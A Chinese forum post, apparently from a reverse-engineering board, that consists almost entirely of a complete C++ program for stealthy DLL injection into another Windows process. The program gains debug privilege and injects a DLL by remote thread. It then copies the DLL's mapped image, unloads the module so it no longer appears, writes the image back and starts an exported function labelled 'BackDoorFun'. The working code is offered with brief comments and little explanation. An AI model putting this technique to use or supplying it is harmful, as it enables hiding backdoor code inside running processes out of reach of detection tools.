TA的每日心情 | 开心
2014-6-18 08:29 |
|---|
签到天数: 14 天 [LV.3]偶尔看看II
滴水大师
 
- 积分
- 2345
|
本帖最后由 大灰狼 于 2014-10-15 10:27 编辑
请见代码分析,实现线程注射
- #include "stdafx.h"
- #include "windows.h"
- #include "stdio.h"
- #include "Psapi.h"
- #include "Tlhelp32.h"
-
-
- //获得加载的DLL模块的信息,主要包括模块基地址和模块大小
- BOOL GetThreadInformation(DWORD ProcessID,char* Dllfullname,MODULEENTRY32 &Thread)
- {
- HANDLE hthSnapshot = NULL;
- // 取得指定进程的所有模块映象.
- hthSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,ProcessID);
- if (hthSnapshot == NULL)
- return FALSE;
- // 取得所有模块列表中的指定的模块.
- BOOL bMoreMods = Module32First(hthSnapshot, &Thread);
- if (bMoreMods == FALSE)
- return FALSE;
- // 循环取得想要的模块.
- for (;bMoreMods; bMoreMods = Module32Next(hthSnapshot, &Thread))
- {
- if (strcmp(Thread.szExePath, Dllfullname) == 0)
- break;
- }
- if (strcmp(Thread.szExePath, Dllfullname) == 0)
- return TRUE;
- else
- return FALSE;
-
- }
- //调整进程权限
- BOOL AdjustPrivileges(HANDLE hProcess,LPCTSTR lpPrivilegeName)
- {
- //******************************************************
- //调整进程权限
- //******************************************************
- HANDLE hToken;
- TOKEN_PRIVILEGES tkp;
- //打开进程的权限标记
- if (!::OpenProcessToken(hProcess,
- TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
- return FALSE;
- //传入lpPrivilegeName的Luid值
- if(!::LookupPrivilegeValue(NULL,
- lpPrivilegeName,
- &tkp.Privileges[0].Luid))
- return FALSE;
-
- tkp.PrivilegeCount = 1;
- tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
- if(!::AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
- (PTOKEN_PRIVILEGES) NULL, 0))
- return FALSE;
- return TRUE;
- }
- //注入DLL部分
- BOOL InjectRemoteProcess(HANDLE hProcess,char* Dllfullname)
- {
-
- //开辟虚拟空间,以便写入DLL的完整路径
- PSTR pDllName=NULL;
- if((pDllName=(PSTR)::VirtualAllocEx(hProcess,
- NULL,
- strlen(Dllfullname)+1,
- MEM_COMMIT|MEM_RESERVE,
- PAGE_EXECUTE_READWRITE))==NULL)
- return FALSE;
-
- BOOL writecode;
- if((writecode=::WriteProcessMemory(hProcess,
- pDllName,
- Dllfullname,
- strlen(Dllfullname)+1,
- NULL))==0)
- return FALSE;
-
- //取得LoadLibrary函数在Kernel32.dll中的地址.
- PTHREAD_START_ROUTINE pfnThreadRtn =
- (PTHREAD_START_ROUTINE)GetProcAddress(
- GetModuleHandle("Kernel32.dll"), "LoadLibraryA");
- if (pfnThreadRtn== NULL)
- return FALSE;
- //打开远线程
- HANDLE hRemoteThread=NULL;
- if((hRemoteThread=::CreateRemoteThread(hProcess,
- NULL,
- 0,
- pfnThreadRtn,
- pDllName, //loadlibrary参数,即dll的路径字符串在远程进程中的地址,若是多参数则放在一个结构体中
- 0,
- NULL))==NULL)
- return FALSE;
- return TRUE;
- }
- //卸载DLL
- BOOL UnistallDll(HANDLE hProcess,BYTE * Address)
- {
-
- // 取得FreeLibrary函数在Kernel32.dll中的地址.
- HANDLE hThread = NULL;
- PTHREAD_START_ROUTINE pfnThreadRtn =
- (PTHREAD_START_ROUTINE)GetProcAddress(
- GetModuleHandle("Kernel32.dll"), "FreeLibrary");
- if (pfnThreadRtn == NULL)
- return FALSE;
- // 创建远程线程来执行FreeLibrary函数.
- hThread = ::CreateRemoteThread(hProcess,
- NULL,
- 0,
- pfnThreadRtn,
- Address,
- 0,
- NULL);
- if (hThread == NULL)
- return FALSE;
- // 等待远程线程终止.
- ::WaitForSingleObject(hThread, INFINITE);
- // 关闭句柄.
- ::CloseHandle(hThread);
- return TRUE;
-
- }
-
- #define pid 3844
- #define BackDoorFun 0x1014//DLL模块中导出函数的地址
- int main(int argc, char* argv[])
- {
- char Dllfullname[255];
- char Dllname[255];
- //打开进程
- HANDLE hRemoteProcess=NULL;
- if((hRemoteProcess=::OpenProcess(PROCESS_ALL_ACCESS,
- FALSE,
- pid))==NULL)
- {
- printf("OpenProcess faile!!");
- return 0;
- }
-
- BOOL Adjust=AdjustPrivileges(hRemoteProcess,SE_DEBUG_NAME);
- if(Adjust==FALSE)
- {
- printf("Adjust process Privileges faile!!\n");
- return 0;
- }
-
- //获得DLL的完整路径
- strcpy(Dllname,"dll.dll");
- ::GetCurrentDirectory(255,Dllfullname);
- strcat(Dllfullname,"\\");
- strcat(Dllfullname,Dllname);
-
- BOOL Res=InjectRemoteProcess(hRemoteProcess,Dllfullname);
- if(Res==FALSE)
- {
- printf("Inject Faile!!\n");
- return 0;
- }
-
- //等待远线程启动,否则获取不到插入的dll信息
- ::Sleep(300);
-
- DWORD RemoteTheadAddress=0;
- MODULEENTRY32 Thread = {sizeof(Thread)};;
- RemoteTheadAddress=GetThreadInformation(pid,Dllfullname,Thread);
- if(RemoteTheadAddress==0)
- {
- printf("Get RemoteTheadAddress Faile!!\n");
- return 0;
- }
-
- //分配保存DLL加载后的的缓冲区,并保存
- char *buffer=new char[Thread.modBaseSize+1];
- DWORD read;
- ::ReadProcessMemory(hRemoteProcess,
- Thread.modBaseAddr,//加载的DLL模块基地址
- buffer,
- Thread.modBaseSize,//加载的DLL代码的大小
- &read);
- //卸载DLL
- BOOL Unstall=UnistallDll(hRemoteProcess,Thread.modBaseAddr);
- if(Unstall==FALSE)
- {
- printf("Unistall dll Faile!!!\n");
- return 0;
- }
- //重新分配虚拟内存,注意从原模块基地址出开始分配
- LPVOID Alloc;
- Alloc=::VirtualAllocEx(hRemoteProcess,Thread.modBaseAddr,Thread.modBaseSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
- if(Alloc== NULL)
- {
- printf("VirtualAllocEx Failed!!\n");
- return 0;
- }
-
- BOOL Writer;DWORD Written;
- Writer=::WriteProcessMemory(hRemoteProcess,Thread.modBaseAddr,buffer,Thread.modBaseSize,&Written);
- if(Writer==0)
- {
- printf("WriteProcessMemory Failed!!\n");
- return 0;
- }
- //重新启动新的无DLL模块的线程中的函数
- HANDLE hNewThread=NULL;
- if((hNewThread=::CreateRemoteThread(hRemoteProcess,
- NULL,
- 0,
- (PTHREAD_START_ROUTINE)(Thread.modBaseAddr+BackDoorFun),//添加到进程中的数据的基地址Thread.modBaseAddr+dll导出函数的入口点地址
- NULL, //此处填写导出函数的参数地址,为简单期间,本导出函数没有参数,若有参数可用注入DLL中同样方法写进进程空间中
- 0,
- NULL))==NULL)
- {
- printf("CreateNewThread faile!!\n");
- return 0;
- }
- return 0;
- }
|
|
发表于 2014-10-15 10:19:24
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
转播
分享
淘帖
支持
反对